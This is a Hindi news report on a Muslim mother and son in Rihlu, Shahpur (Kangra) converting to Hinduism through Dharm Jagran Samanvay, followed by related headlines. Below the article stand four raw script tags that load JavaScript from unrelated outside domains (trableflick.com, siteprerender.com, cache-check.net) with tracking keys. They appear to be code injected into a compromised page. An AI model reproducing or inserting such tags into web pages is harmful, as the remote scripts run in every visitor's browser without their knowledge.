<p>जिला कांगड़ा के शाहपुर विधानसभा क्षेत्र की ग्राम पंचायत रिहलु में धर्म जागरण समन्वय के सानिध्य में मुस्लिम परिवार ने धर्म परिवर्तन करके हिंदू धर्म अपनाया। धर्म जागरण प्रान्त संस्कृति प्रमुख गिरधारी दास और प्रान्त उप प्रमुख बलराम दास ने कहा कि बह रिहलु गांव में धर्म के प्रचार हेतु गए थे। उन्हें सूचना प्राप्त हुई कि मुस्लिम परिवार हिन्दू धर्म अपनाना चाहता है, लेकिन उन्हें विधि का ज्ञान नहीं था। उसी सिलसिले में बह उनके घर गए और उन्हें विधि से अवगत करवाया।</p>
<p>सराजद्दीन एवं शलीमा ने हिन्दू धर्म को अपनाया। सराजद्दीन का नाम अब रमन हो गया और शलीमा अब शमिला देवी हो गई। दोनों ने धर्म जागरण समन्वय के अध्यक्षता में हिन्दू धर्म को स्वीकार किया। साथ ही धर्म जागरण के कार्यकर्ता उपस्थित रहे उन्होंने शास्त्रोचित तरीके से यज्ञ द्वारा शुद्धिकरण किया। मुस्लिम परिवार हिन्दू धर्म को अपनाकर खुशी का अनुभव कर रहे हैं। दोनो मां बेटे सरकारी सेवा में कार्यरत हैं। रिहलू पंचायत प्रधान सीमा देवी ने दोनों का स्वागत किया है।</p>
<p>वहीं, इस मामले पर एसडीएम शाहपुर मुरारी लाल ने कहा कि उन्हें इस बारे में कोई जानकारी नहीं दी गई है। इस बारे में जानकारी एकत्रित करवाई जाएगी।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1596021318211″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
NPS employees Himachal DA update: हिमाचल प्रदेश सरकार ने राष्ट्रीय पेंशन प्रणाली (एनपीएस) के तहत…
Festive financial boost for Himachal: वित्तीय संकट से जूझ रहे हिमाचल प्रदेश को केंद्र सरकार…
Yamuna Sharad Festival 2024: नगर निगम पांवटा साहिब द्वारा आयोजित ‘यमुना शरद महोत्सव’ इस वर्ष…
Masked Attacker Injured Schoolgirl: कांगड़ा के रक्कड़ में एक दसवीं कक्षा की छात्रा पर अज्ञात…
District Athletics Meet: गुरुवार दोपहर को हमीरपुर के सिंथेटिक ट्रैक पर जिला स्तरीय एथलेटिक्स मीट…
Prostration Journey to Mata Bala Sundari: हरियाणा के करनाल से श्रद्धालुओं का एक जत्था…